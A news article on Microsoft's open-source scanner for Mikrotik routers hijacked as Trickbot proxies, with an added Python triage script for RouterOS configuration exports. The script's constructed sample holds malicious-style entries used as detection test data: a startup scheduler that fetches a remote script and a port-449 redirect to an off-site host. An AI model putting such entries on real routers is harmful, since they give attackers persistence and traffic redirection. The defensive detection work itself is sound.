Microsoft releases open source Trickbot scanner for Mikrotik routers

Botnet remains a serious threat worldwide.

Microsoft's Defender for Internet of Things Research Team and Threat Intelligence Centre have jointly released an open source forensic tool for popular Mikrotik routers that have been hacked to act as proxy servers for the Trickbot malware gang.

[Image. Source: Mikrotik]

The researchers found that attackers, who had several ways to gain access to Mikrotik routers, used commands specific to the Latvian vendor's RouterOS operating system (each preceded by the "/" character) to redirect traffic to and from Trickbot command-and-control servers.

With the help of Microsoft's routeros-scanner tool, administrators can obtain a device's version identifier and map it to known Common Vulnerabilities and Exposures (CVE) entries.

The tool also lets administrators check for scheduled tasks, traffic redirection rules, domain name system (DNS) cache poisoning, changes to default ports, suspicious files, non-default user accounts, and rules that set up proxying or change the device's firewall settings.
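The indicator classes listed above (scheduled tasks, traffic redirection, static DNS entries, changed service ports, non-default users) can be triaged from a plain RouterOS configuration export. The script below is an added example written for this article; it is not Microsoft's routeros-scanner and does not reproduce its logic. It assumes the text format of RouterOS's `/export` command (a section header starting with "/", followed by `add`/`set` lines of key=value pairs, long lines wrapped with a trailing backslash). The sample export embedded in it is constructed and uses RFC 5737 documentation addresses; the "LAN" networks used to decide whether a redirect points off-site are an assumption a real deployment would replace with its own subnets.

```python
"""Triage a RouterOS `/export` dump for the indicator classes named in the
article: scheduler entries, dst-nat redirection off the local network,
static DNS entries, non-default service ports and non-default users.

Added example, not Microsoft's routeros-scanner. Export format and LAN
ranges are assumptions; the sample export is constructed.
"""
import ipaddress
import shlex

# Default listening ports for /ip service entries (RouterOS defaults).
DEFAULT_SERVICE_PORTS = {
    "telnet": 23, "ftp": 21, "www": 80, "ssh": 22,
    "www-ssl": 443, "api": 8728, "winbox": 8291, "api-ssl": 8729,
}
DEFAULT_USERS = {"admin"}
# Assumed local ranges: a dst-nat target outside these is treated as off-site.
LAN_NETWORKS = [ipaddress.ip_network(n)
                for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Constructed sample export (not from a real device). Addresses are RFC 5737.
SAMPLE_EXPORT = """\
# constructed sample
/ip dns static
add address=203.0.113.10 name=update.example
/ip firewall nat
add action=dst-nat chain=dstnat dst-port=449 protocol=tcp \\
    to-addresses=198.51.100.7 to-ports=449
add action=masquerade chain=srcnat out-interface=ether1
/ip service
set ssh port=2222
set www port=80
/system scheduler
add interval=1d name=upd on-event=":do { /tool fetch url=\\"http://203.0.113.10/s.rsc\\" } on-error={}" start-time=startup
/user
add group=full name=service
"""


def _logical_lines(text):
    """Join export lines that were wrapped with a trailing backslash."""
    buf = ""
    for raw in text.splitlines():
        line = raw.strip()
        if line.endswith("\\"):
            buf += line[:-1] + " "
            continue
        yield buf + line
        buf = ""


def parse_export(text):
    """Yield (section, verb, params) for each add/set line in the export."""
    section = None
    for line in _logical_lines(text):
        if not line or line.startswith("#"):
            continue
        if line.startswith("/"):          # section header, e.g. "/ip firewall nat"
            section = line
            continue
        tokens = shlex.split(line)        # handles quoted on-event scripts
        verb, params = tokens[0], {}
        for tok in tokens[1:]:
            key, eq, value = tok.partition("=")
            if eq:
                params[key] = value
            else:
                params.setdefault("_item", key)   # "set ssh port=..." -> item "ssh"
        yield section, verb, params


def _off_site(addr_spec):
    """True when a to-addresses value (single or range) lies outside LAN_NETWORKS."""
    try:
        addr = ipaddress.ip_address(addr_spec.split("-")[0])
    except ValueError:
        return False
    return not any(addr in net for net in LAN_NETWORKS)


def triage(text):
    """Return (category, severity, detail) tuples for review."""
    findings = []
    for section, verb, p in parse_export(text):
        if section == "/system scheduler":
            # Any scheduler entry deserves a look; one that fetches is worse.
            sev = "high" if "fetch" in p.get("on-event", "") else "review"
            findings.append(("scheduler", sev, p.get("name", "?")))
        elif section == "/ip firewall nat" and p.get("action") == "dst-nat":
            target = p.get("to-addresses", "")
            if _off_site(target):
                findings.append(("redirect", "high",
                                 f"{p.get('dst-port')}->{target}:{p.get('to-ports')}"))
        elif section == "/ip dns static":
            findings.append(("dns-static", "review",
                             f"{p.get('name')}={p.get('address')}"))
        elif section == "/ip service" and verb == "set":
            svc = p.get("_item")
            if svc in DEFAULT_SERVICE_PORTS:
                port = int(p.get("port", DEFAULT_SERVICE_PORTS[svc]))
                if port != DEFAULT_SERVICE_PORTS[svc]:
                    findings.append(("service-port", "review", f"{svc}:{port}"))
        elif section == "/user" and verb == "add" and p.get("name") not in DEFAULT_USERS:
            findings.append(("user", "review", f"{p.get('name')} ({p.get('group')})"))
    return findings


if __name__ == "__main__":
    for category, severity, detail in triage(SAMPLE_EXPORT):
        print(f"[{severity:6}] {category:12} {detail}")
```

Feed it the output of `/export` saved from a device under review; each finding is a pointer to a configuration item for a human to confirm, not a verdict on its own. Static DNS entries and extra users are legitimate on many routers, which is why they are reported as "review" while a dst-nat rule to an off-site host and a scheduler script that fetches content are raised as "high".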

Internet-reachable Mikrotik routers have been on hackers' radars for several years now. 

The Latvian router vendor suffered a major RouterOS vulnerability in 2018, which led to login credentials being captured.

Microsoft said that a vulnerability for which security vendor Tenable produced a proof-of-concept affects RouterOS older than version 4.2, and allows attackers to read arbitrary files on Mikrotik routers, such as user.dat, which contains device passwords.

A search for Mikrotik routers connected to the internet via the Shodan.io scanning site showed just over 77,000 devices in Australia and New Zealand, and more than 3.3 million worldwide.

Built on the earlier Dyre malware, Trickbot is considered one of the world's most dangerous botnets, and is often used to deliver ransomware payloads.

Microsoft security engineers have cooperated with law enforcement worldwide to take down Trickbot infrastructure, resulting in some of the malware coders being arrested and extradited to the United States to stand trial.

Copyright © iTnews.com.au . All rights reserved.